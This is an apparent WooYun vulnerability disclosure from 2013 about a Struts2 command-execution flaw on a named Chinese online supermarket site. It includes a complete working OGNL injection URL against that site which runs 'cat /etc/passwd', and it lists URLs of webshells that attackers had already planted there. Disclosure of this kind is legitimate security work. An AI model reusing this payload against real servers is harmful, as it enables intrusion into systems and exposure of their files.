当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040384

漏洞标题:某网上超市购物商城任意命令执行漏洞

相关厂商:XX线网上超市在线订购商城

漏洞作者: 阿牛哥

提交时间:2013-10-21 17:17

修复时间:2013-12-05 17:17

公开时间:2013-12-05 17:17

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

struct2 命令执行

详细说明:

www.line0.com 零号线网上超市在线订购商城
南京零号线电子商务有限公司(line0),基于Location Based及020模式的倡导者和先行者,以整合了本地化商家资源的生态链、强大易用的网络平台,和第一方的同城即时配送服务为本地商家和顾客搭起"光速直通车",真正实现"零距离的本地E生活"。
怀着通达天下的创业梦想,零号线聚集的是来自各大成熟电商平台的菁英。而这样的梦想、团队和020的巨大潜在市场也让专业的资本倾力投入……
改变人们生活习惯的事业正在这里酝酿……
巧合或是机缘,公司坐落在美丽的1865创意园——当年洋务运动的金陵制造局,百多年前强国梦从这里而起。

漏洞证明:

用struct漏洞利用工具测试,特别说明,本人只做了简单测试,发现可以上传木马文件,但只做简单的检测,无任何盗窃,破坏数据,修改数据的恶意行为

http://www.line0.com/activity/toInviteActivity.do?redirect:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


xxoo.png


该网站已经被黑客上传了多个木马:
http://www.line0.com/r1.jsp
http://www.line0.com/r2.jsp
http://www.line0.com/nimei.jsp
http://www.line0.com/kn1f31.jsp

修复方案:

升级,打补丁,删除已经被上传的木马

版权声明:转载请注明来源 阿牛哥@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝